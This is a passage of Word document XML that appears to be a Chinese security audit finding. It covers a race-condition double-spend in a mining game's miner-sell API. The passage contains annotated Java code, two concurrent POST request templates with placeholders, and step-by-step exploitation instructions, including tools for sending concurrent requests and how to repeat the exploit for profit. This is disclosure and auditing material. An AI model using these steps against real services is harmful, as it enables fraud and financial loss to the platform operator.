        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T1 先获取账户行锁（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">），将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id=100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 矿机对应的卖出价加入金币余额，保存，删除矿机，事务提交。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>T2 阻塞后解锁，以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>账户刚被 T1 更新后的余额</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">为基础，再次将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>同一矿机 id=100 的卖出价</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">加入余额（因 T2 在 T1 提交前已持有该矿机对象引用，此时 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>minerLevel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 仍来自 T1 读取到的矿机），保存账户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="419"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">T2 尝试删除 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>id=100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（已被 T1 删除），Spring Data JPA 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>delete(entity)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 底层执行 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>DELETE WHERE id=?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，影响行数为 0，静默成功，事务正常提交。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>净结果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>一台矿机被删除，但金币余额增加了两份卖出价</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（双花）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>与此形成对比的是，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（格子坑位）分支的注释明确写明"行级排他锁，与升星互斥"，且对应方法 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndSlotIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 按职责为单行精确查询，两分支的保护力度存在明显不对称。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="42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POST /api/miner/sell</w:t>
              <w:br/>
              <w:t xml:space="preserve">    → MinerController.sell()         [TokenAuthFilter 验证 userId，来自 Token，不可伪造]</w:t>
              <w:br/>
              <w:t xml:space="preserve">      → MinerService.sell()          [@Transactional，协调矿机查询与账户增款]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        → resolveMinerToSell()       [惰性锁获取——存放处路径缺少行级排他锁]</w:t>
              <w:br/>
              <w:t xml:space="preserve">          → findByUserIdAndInStorageForUpdate()  [实现未知，注释明言"无 FOR UPDATE"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        → findByUserIdForUpdate()    [账户行级锁——此时竞态窗口已关闭太晚]</w:t>
              <w:br/>
              <w:t xml:space="preserve">        → account.setGoldBalance()   [双花点：并发事务各加一次同一矿机卖出价]</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        → userMinerRepository.delete(miner)  [T2 删除已不存在的行，静默 no-op]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>关键时序窗口：两事务均在账户锁之前完成矿机对象的读取，账户锁只能保证金额写入串行，但无法阻止两事务各自持有同一矿机对象后分别执行加款。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="42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攻击者（恶意用户）利用并发请求，每次操作可将一台矿机的卖出价双倍计入金币余额。若游戏内金币可兑换其他价值物（矿机购买、电力充值等），或金币本身通过充值购得，则直接导致平台经济损失。在自动化脚本辅助下，可短时间内批量刷取大量金币。</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SellForm 字段定义（攻击者可控）：</w:t>
              <w:br/>
              <w:t>//   Integer inStorage;   ← @Range(min=0, max=1)，0=格子 1=存放处</w:t>
              <w:br/>
              <w:t>//   Integer slotId;      ← @Range(min=1, max=9)，存放处时为序号</w:t>
              <w:br/>
              <w:t>@PostMapping("/sell")</w:t>
              <w:br/>
              <w:t>public ApiResponse&lt;Void&gt; sell(@CurrentUserId Long userId,   // ← userId 来自 Token，安全可信</w:t>
              <w:br/>
              <w:t xml:space="preserve">                               @RequestBody @Valid SellForm form) {  // ← inStorage/slotId 完全攻击者可控</w:t>
              <w:br/>
              <w:t xml:space="preserve">    minerService.sell(userId, form.getInStorage(), form.getSlotId());  // ← 污点传入 service 层</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return ApiResponse.success();</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② 核心业务方法：MinerService.java  sell()</w:t>
              <w:br/>
              <w:t>@Transactional</w:t>
              <w:br/>
              <w:t>public void sell(Long userId, Integer inStorage, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireSystemRunning();</w:t>
              <w:br/>
              <w:t xml:space="preserve">    banCheckService.requireNotBanned(userId);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserMiner miner = resolveMinerToSell(userId, inStorage, slotId);  // ← T1/T2 均在此获取同一矿机对象</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal sellPrice = getSellPrice(miner.getMinerLevel() != null ? miner.getMinerLevel() : 1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = userAccountRepository.findByUserIdForUpdate(userId)  // ← 账户行锁在矿机锁之后获取</w:t>
              <w:br/>
              <w:t xml:space="preserve">            .orElseThrow(() -&gt; new IllegalArgumentException("用户账户不存在"));</w:t>
              <w:br/>
              <w:t xml:space="preserve">    account.setGoldBalance(account.getGoldBalance().add(sellPrice));  // ← 双花点：T1/T2 各执行一次，累加两倍卖出价</w:t>
              <w:br/>
              <w:t xml:space="preserve">    userAccountRepository.save(account);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    userMinerRepository.delete(miner);  // ← T2 执行时矿机已被 T1 删除，静默 no-op，不抛异常</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 竞态根源：MinerService.java  resolveMinerToSell()</w:t>
              <w:br/>
              <w:t>private UserMiner resolveMinerToSell(Long userId, Integer inStorage, Integer slotId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    } else {</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        // 存放处查询无 FOR U</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>PDATE，并发售卖同一序号矿机可双花金币  // ← 开发者自注明漏洞存在</w:t>
              <w:br/>
              <w:t xml:space="preserve">        List&lt;UserMiner&gt; storage = userMinerRepository.findByUserIdAndInStorageForUpdate(userId, 1);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // ↑ 方法名含 ForUpdate，但实现未包含在审计上下文中；</w:t>
              <w:br/>
              <w:t xml:space="preserve">        //   注释明言"无 FOR UPDATE"——若实现确无行锁，则 T1/T2 读取到完全相同的列表与矿机对象</w:t>
              <w:br/>
              <w:t xml:space="preserve">        storage.sort(Comparator.comparing(UserMiner::getId));</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int idx = slotId - 1;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (idx &gt;= storage.size()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            throw new IllegalArgumentException("存放处无该序号矿机");</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        return storage.get(idx);  // ← T1 与 T2 在竞态窗口内返回同一矿机对象</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以下两个请求需在同一毫秒级时间窗口内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发发出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（使用同一有效用户 Token，且该账户存放处 slotId=1 位置存在至少一台矿机）：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A（与请求 B 并发）</w:t>
              <w:br/>
              <w:t>POST /api/miner/sell HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机字符串A&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按 ParamSortSignUtils 规则计算的签名A&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"inStorage":1,"slotId":1}</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B（与请求 A 并发）</w:t>
              <w:br/>
              <w:t>POST /api/miner/sell HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效用户Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;当前时间戳&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;随机字符串B（不同于A以绕过 nonce 幂等保护）&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;按 ParamSortSignUtils 规则计算的签名B&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"inStorage":1,"slotId":1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前置条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：使用目标用户账户在存放处（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>inStorage=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）持有至少一台矿机（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>slotId=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对应位置）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="424"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用并发工具（如 Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>ab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>wrk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 或 Burp Suite 的 Turbo Intruder）在同一瞬间并发发出上述两个 POST 请求（不同 nonce 值，签名分别计算）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="425"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>竞态触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：若 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndInStorageForUpdate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 实现中缺失 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SELECT ... FOR UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，两事务均完成矿机对象读取后串行执行账户加款，导致金币余额增加 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2×矿机卖出价</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，而存放处仅减少一台矿机。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="426"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>验证结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：查询金币余额接口，确认余额增量是否等于该矿机单价的两倍；同时确认存放处矿机数量仅减少一台（而非两台）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="427"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>重复获利</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：若矿机可补充（购买/获取），可循环操作将金币倍增。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="42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429"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通注册用户；需要持有有效 Bearer Token 及签名凭证（</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appSecret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），在签名校验启用时需额外满足签名鉴权要求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="430"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>需要资源前提：操作账号在存放处持有至少一台矿机</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 1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受影响调用链（2 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="431"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
